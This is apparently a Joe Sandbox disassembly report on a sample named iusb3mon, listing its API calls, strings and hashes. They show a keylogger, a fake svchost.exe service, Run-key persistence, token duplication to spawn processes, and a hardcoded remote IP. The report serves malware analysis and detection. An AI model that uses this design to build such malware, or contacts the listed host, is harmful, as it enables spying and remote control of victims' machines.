Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocCreateErrorHeapLastThread
String ID:
API String ID: 3580101977-0
Opcode ID: 30709fdbbbc4e1b6119781577b9ec766fd52eadc9fc7e02f125dc44368171031
Instruction ID: 5180e03c419948c96c45912552908be8770785b38fc1ea577ac30ca8eb30388a
Opcode Fuzzy Hash: 30709fdbbbc4e1b6119781577b9ec766fd52eadc9fc7e02f125dc44368171031
Instruction Fuzzy Hash: 2DF0A4366142166BDBE4AF6ADC04E9B7FA5DF417B1B10812DFB2887680CB3198119BA1

Function 06CFED44 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,06CFB5EB,00000001), ref: 06CFED55

Part of subcall function 06CFEBFC: GetVersionExA.KERNEL32 ref: 06CFEC1B

HeapDestroy.KERNEL32 ref: 06CFED94

Part of subcall function 06CFEE49: HeapAlloc.KERNEL32(00000000,00000140,06CFED7D,000003F8), ref: 06CFEE56

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 401a06b09187f30bf97200f3c3ba396be6b92efbd049d557b2033a53820a1bd0
Instruction ID: db98eaa3a4ad71bf6b9464b31f76131925c4124f22310fd8bb8b0b69693bd24d
Opcode Fuzzy Hash: 401a06b09187f30bf97200f3c3ba396be6b92efbd049d557b2033a53820a1bd0
Instruction Fuzzy Hash: 33F06574A71302BDEFF01B706C09B2D3A969B88641F104829E712C46F4EFA08384A702

Function 06CFA1C0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,06CF69AD,c:\inst.ini,00000000), ref: 06CFA1C4
GetLastError.KERNEL32 ref: 06CFA1CF

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: ff154c7991ff4cbdd3c0e8060f662f2e93547c2f996be262d83dedb27f873333
Instruction ID: bd9b955223c693d9a50f985e0a121e924a2b8e2387372f19e8b7395fe87ba057
Opcode Fuzzy Hash: ff154c7991ff4cbdd3c0e8060f662f2e93547c2f996be262d83dedb27f873333
Instruction Fuzzy Hash: 31E08C30930202CAEBE22BB6CD4C309FA915F42765F158A48E77EC52E0CB368440EA62

Function 06CFACDB Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,06CF8D56,00000000,00000000,00000000), ref: 06CFADC2

Part of subcall function 06CFCFF4: InitializeCriticalSection.KERNEL32(00000000,00000000,06CF8D56,?,06D00113,00000009,00000000,00000000,00000000,00000000,00000000,?,06CF8D56,?,?,06CF8CE2), ref: 06CFD031
Part of subcall function 06CFCFF4: EnterCriticalSection.KERNEL32(06CF8D56,06CF8D56,?,06D00113,00000009,00000000,00000000,00000000,00000000,00000000,?,06CF8D56,?,?,06CF8CE2,?), ref: 06CFD04C

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: de75f6c0591eda0224ac84ea6ae7c8e7b740eb7a551a42a15a0fbdab77b7dbfa
Instruction ID: ed949000dda6fbc25fb96eca2a9339cf2c74758761789b857e572463b838e092
Opcode Fuzzy Hash: de75f6c0591eda0224ac84ea6ae7c8e7b740eb7a551a42a15a0fbdab77b7dbfa
Instruction Fuzzy Hash: 4321F731A20205EFDBD0DBA9DC41B9DF764EB00B61F104619FE24EB2C0C774AA419750

Function 00C10109 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00C023D4,00000000), ref: 00C1013B

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: acac269924b8356bcfd2f2bad6a6ba2407d9cb907de66bd9b5dd3c795755cd85
Instruction ID: de48cb0fc63eba2eb42ed63bb2318a8131a7a0fda8093d4061e128a4b35ec423
Opcode Fuzzy Hash: acac269924b8356bcfd2f2bad6a6ba2407d9cb907de66bd9b5dd3c795755cd85
Instruction Fuzzy Hash: 35E0A031240111B7D63126614C05BDE265CAB433B0F300121EC6AD61E1CBB8CDC1E2E0

Function 06CFB4C3 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 06CFB4F8

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 1123a002ef48fa47daf13bf99a3eaa5cbd40f089794cc7dbe8886082b334cb5d
Instruction ID: f7fbfc26f3b204b639ab58abf6e96031b66acbcbaa3de7f461557badd0210afd
Opcode Fuzzy Hash: 1123a002ef48fa47daf13bf99a3eaa5cbd40f089794cc7dbe8886082b334cb5d
Instruction Fuzzy Hash: 2FE0C232A70419ABEBE237A0DC05AAE7B25EF00300F044414EF10AA250DF509D51A6E2

Function 06CFB4CE Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 06CFB4F8

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 4cb0b369bcdf51ecf2056ab5b2693b285b5d60c31eeca9ec13af962bdec8260e
Instruction ID: afeca9032b50e865f6f35c7cd7489ade1627d7fdb62aea3eba539f7855a5f2d2
Opcode Fuzzy Hash: 4cb0b369bcdf51ecf2056ab5b2693b285b5d60c31eeca9ec13af962bdec8260e
Instruction Fuzzy Hash: 45D0A731B70515ABF6F23720DC05B6F2B49DF00750B044419FB10DA240DF50DE41A1E2

Function 06CF1C74 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,00000080,06CF682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06CF1C88

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 14ff7f03b352356af8d29687ed0faa7da12b19fb693c9b60b669dce8fb7248b2
Instruction ID: 1b516ba20bfe29f5684b3065e81ed63f94295764641b6b214a3b5a9d5a6144e8
Opcode Fuzzy Hash: 14ff7f03b352356af8d29687ed0faa7da12b19fb693c9b60b669dce8fb7248b2
Instruction Fuzzy Hash: 99C09B30558341F9FFD95720CA4DB597F525750744F488558B3C5544F0C7B140D4C701

Non-executed Functions

Function 06CF838B Relevance: 250.5, APIs: 71, Strings: 72, Instructions: 296libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,143.92.60.116,00000000,76230F10,06CF6B62), ref: 06CF83A5
GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 06CF83B6
GetProcAddress.KERNEL32(?,GetModuleFileNameA), ref: 06CF83C3
GetProcAddress.KERNEL32(?,CreateMutexA), ref: 06CF83D0
GetProcAddress.KERNEL32(?,ReleaseMutex), ref: 06CF83DD
GetProcAddress.KERNEL32(?,GetLastError), ref: 06CF83EA
GetProcAddress.KERNEL32(?,CloseHandle), ref: 06CF83F7
GetProcAddress.KERNEL32(?,Sleep), ref: 06CF8404
GetProcAddress.KERNEL32(?,lstrcatA), ref: 06CF8411
GetProcAddress.KERNEL32(?,GetTickCount), ref: 06CF841E
GetProcAddress.KERNEL32(?,WaitForSingleObject), ref: 06CF842B
GetProcAddress.KERNEL32(?,GetFileAttributesA), ref: 06CF8438
GetProcAddress.KERNEL32(?,CreateEventA), ref: 06CF8445
GetProcAddress.KERNEL32(?,ResetEvent), ref: 06CF8452
GetProcAddress.KERNEL32(?,CancelIo), ref: 06CF845F
GetProcAddress.KERNEL32(?,SetEvent), ref: 06CF846C
GetProcAddress.KERNEL32(?,TerminateThread), ref: 06CF8479
GetProcAddress.KERNEL32(?,GetVersionExA), ref: 06CF8486
GetProcAddress.KERNEL32(?,GetExitCodeProcess), ref: 06CF8493
GetProcAddress.KERNEL32(?,ExpandEnvironmentStringsA), ref: 06CF84A0
GetProcAddress.KERNEL32(?,GetSystemInfo), ref: 06CF84AD
GetProcAddress.KERNEL32(?,GetSystemDirectoryA), ref: 06CF84BA
GetProcAddress.KERNEL32(?,MoveFileA), ref: 06CF84C7
GetProcAddress.KERNEL32(?,MoveFileExA), ref: 06CF84D4

Strings

CreateServiceA, xrefs: 06CF8720
ExpandEnvironmentStringsA, xrefs: 06CF8495
GetFileAttributesA, xrefs: 06CF842D
setsockopt, xrefs: 06CF8648
kernel32.dll, xrefs: 06CF83A0
CreateEventA, xrefs: 06CF843A
ws2_32.dll, xrefs: 06CF85B0
DuplicateTokenEx, xrefs: 06CF8760
select, xrefs: 06CF8668
GetSystemInfo, xrefs: 06CF84A2
DeleteService, xrefs: 06CF8740
CloseServiceHandle, xrefs: 06CF86F0
OpenSCManagerA, xrefs: 06CF86C0
htons, xrefs: 06CF85F8
TerminateThread, xrefs: 06CF846E
GetExitCodeProcess, xrefs: 06CF8488
recv, xrefs: 06CF8628
MoveFileA, xrefs: 06CF84BC
CloseHandle, xrefs: 06CF83EC
ControlService, xrefs: 06CF8710
StartServiceA, xrefs: 06CF86E0
strstr, xrefs: 06CF85A0
SendMessageA, xrefs: 06CF8538
WSACleanup, xrefs: 06CF85C8
GetSystemDirectoryA, xrefs: 06CF84AF
CreateProcessAsUserA, xrefs: 06CF8780
SetServiceStatus, xrefs: 06CF86A5
MoveFileExA, xrefs: 06CF84C9
memset, xrefs: 06CF8590
WTSGetActiveConsoleSessionId, xrefs: 06CF84D6
strcmp, xrefs: 06CF8565
socket, xrefs: 06CF85D8
WaitForSingleObject, xrefs: 06CF8420
memcpy, xrefs: 06CF8580
wsprintfA, xrefs: 06CF84FD
GetCurrentProcess, xrefs: 06CF84E3
User32.dll, xrefs: 06CF84F0
OpenServiceA, xrefs: 06CF86D0
ADVAPI32.dll, xrefs: 06CF8698
Sleep, xrefs: 06CF83F9
SetEvent, xrefs: 06CF8461
CreateMutexA, xrefs: 06CF83C5
gethostname, xrefs: 06CF8688
ResetEvent, xrefs: 06CF8447
RegisterServiceCtrlHandlerA, xrefs: 06CF86B0
EnumWindows, xrefs: 06CF8548
GetLastError, xrefs: 06CF83DF
CreateProcessA, xrefs: 06CF83AD
lstrcatA, xrefs: 06CF8406
OpenProcessToken, xrefs: 06CF8750
connect, xrefs: 06CF8608
QueryServiceStatus, xrefs: 06CF8706
gethostbyname, xrefs: 06CF85E8
getsockname, xrefs: 06CF8678
ExitWindowsEx, xrefs: 06CF8508
143.92.60.116, xrefs: 06CF839F
wininet.dll, xrefs: 06CF8790
MSVCRT.dll, xrefs: 06CF8558
IsWindowVisible, xrefs: 06CF8528
SetTokenInformation, xrefs: 06CF8770
closesocket, xrefs: 06CF8638
CancelIo, xrefs: 06CF8454
GetModuleFileNameA, xrefs: 06CF83B8
WSAIoctl, xrefs: 06CF8658
GetVersionExA, xrefs: 06CF847B
ReleaseMutex, xrefs: 06CF83D2
MessageBoxA, xrefs: 06CF8518
GetTickCount, xrefs: 06CF8413
ChangeServiceConfig2A, xrefs: 06CF8730
WSAStartup, xrefs: 06CF85BD
send, xrefs: 06CF8618
strlen, xrefs: 06CF8570

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: 143.92.60.116$ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
API String ID: 2238633743-2469201335
Opcode ID: 94253aeb7015c9643e9cd8268144e1e6821d862add545055df41ca880d0095bd
Instruction ID: be228275afa47259de1b1c2bbad6bbebc9a9aab62928ac48d6d65d670088795c
Opcode Fuzzy Hash: 94253aeb7015c9643e9cd8268144e1e6821d862add545055df41ca880d0095bd
Instruction Fuzzy Hash: 9DB15270540B85BEE771AF32EC05D6BBFE1EF84B00B01492DE8AA4A560D7B1E859DF40

Function 06CF6D6C Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 168serviceregistrystringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,143.92.60.116,06D1CC34,00000000), ref: 06CF6DA1
wsprintfA.USER32 ref: 06CF6E5A
OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 06CF6E7F
CreateServiceA.ADVAPI32(00000000,?,06D1CA80,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 06CF6EB8
LockServiceDatabase.ADVAPI32(00000000), ref: 06CF6EC5
ChangeServiceConfig2A.ADVAPI32(?,00000001,06D1CA80), ref: 06CF6EE9
ChangeServiceConfig2A.ADVAPI32(?,00000002,00015180), ref: 06CF6F64
UnlockServiceDatabase.ADVAPI32(?), ref: 06CF6F70
GetLastError.KERNEL32 ref: 06CF6F7E
OpenServiceA.ADVAPI32(?,?,000F01FF), ref: 06CF6F99
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 06CF6FAC
StartServiceA.ADVAPI32(?,00000000,00000000), ref: 06CF6FBA
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 06CF6FFA
lstrlenA.KERNEL32(06CF6D4E), ref: 06CF7003
RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,06CF6D4E,00000000), ref: 06CF701A

Strings

SYSTEM\CurrentControlSet\Services\, xrefs: 06CF6FC4
Description, xrefs: 06CF700F
C:\Windows\svchost.exe, xrefs: 06CF6E47, 06CF6E4D
143.92.60.116, xrefs: 06CF6D91

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Service$Open$ChangeConfig2DatabaseStart$CreateErrorFileLastLockManagerModuleNameUnlockValuelstrlenwsprintf
String ID: 143.92.60.116$C:\Windows\svchost.exe$Description$SYSTEM\CurrentControlSet\Services\
API String ID: 432064258-2972064292
Opcode ID: 0bc516e32a8b859be82540f5808b5dff34551ac8f3891a99aec589af9372a5c9
Instruction ID: bb19c2cc37ddd099563ab5ab1269dbd9a8b9804ff3df235fdfc0a107d284453a
Opcode Fuzzy Hash: 0bc516e32a8b859be82540f5808b5dff34551ac8f3891a99aec589af9372a5c9
Instruction Fuzzy Hash: 35713F71C042A8EFEB628F64DC88B9DBBB9AB09744F0444D9E21CA6251C7755B88CF61

Function 06CF5792 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103libraryloaderprocessCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(userenv.dll), ref: 06CF57A6
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 06CF57B7
GetCurrentProcess.KERNEL32 ref: 06CF57FF
OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 06CF580F
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 06CF5826
LoadLibraryA.KERNEL32(Kernel32.dll,WTSGetActiveConsoleSessionId), ref: 06CF5836
GetProcAddress.KERNEL32(00000000), ref: 06CF5839
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 06CF584F
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 06CF587B
CloseHandle.KERNEL32(?), ref: 06CF588D
CloseHandle.KERNEL32(?), ref: 06CF5892
FreeLibrary.KERNEL32(?), ref: 06CF58A0

Strings

userenv.dll, xrefs: 06CF57A1
WTSGetActiveConsoleSessionId, xrefs: 06CF582C
WinSta0\Default, xrefs: 06CF57F8
CreateEnvironmentBlock, xrefs: 06CF57AE
Kernel32.dll, xrefs: 06CF5831
D, xrefs: 06CF57F1

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: LibraryProcessToken$AddressCloseHandleLoadProc$CreateCurrentDuplicateFreeInformationOpenUser
String ID: CreateEnvironmentBlock$D$Kernel32.dll$WTSGetActiveConsoleSessionId$WinSta0\Default$userenv.dll
API String ID: 1797627335-1926497751
Opcode ID: 34efb7b456f22617fe4d63fd7142557aeec7e4b5297e088fe7c9968d72cdea19
Instruction ID: df24d8f475bf8c9fb43e11f9c01b11ed018d528d39a9be025e8ba8af4273483c
Opcode Fuzzy Hash: 34efb7b456f22617fe4d63fd7142557aeec7e4b5297e088fe7c9968d72cdea19
Instruction Fuzzy Hash: 793104B1D51229BBEB50AFE5DC49EDEBFBEEF08710F100416F205A6250C6B05A44DBA0

Function 06CF2BF0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 164keyboardsynchronizationsleepCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,KeyLogger), ref: 06CF2C05
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 06CF2C0E
Sleep.KERNEL32(0000000A), ref: 06CF2C6E
lstrlenA.KERNEL32(?), ref: 06CF2C7B
GetKeyState.USER32(00000010), ref: 06CF2CD9
GetAsyncKeyState.USER32(?), ref: 06CF2CEC
GetKeyState.USER32(00000014), ref: 06CF2CF9
GetKeyState.USER32(00000014), ref: 06CF2D25

Strings

<Enter>, xrefs: 06CF2DB0
<BackSpace>, xrefs: 06CF2D90
KeyLogger, xrefs: 06CF2BFE

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: State$AsyncCreateMutexObjectSingleSleepWaitlstrlen
String ID: <BackSpace>$<Enter>$KeyLogger
API String ID: 2104880762-1889060070
Opcode ID: 162092dd9263cf0d5ff3a31ed967a723fa8b1150307b2465f048ca700895c521
Instruction ID: b32fa3e7fe09b3abd014c7134a5ad71bc20cda0d796a336290d5e401477d0765
Opcode Fuzzy Hash: 162092dd9263cf0d5ff3a31ed967a723fa8b1150307b2465f048ca700895c521
Instruction Fuzzy Hash: 725107B2D10618BFEFE0ABE5DC48B9A7769AF44311F1044A5E715A7280D738CB49CF92

Function 06CF628E Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 46processsleepshutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF1F38: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,06CF62A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06CF1F56

Part of subcall function 06CF5CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06CF5CF6
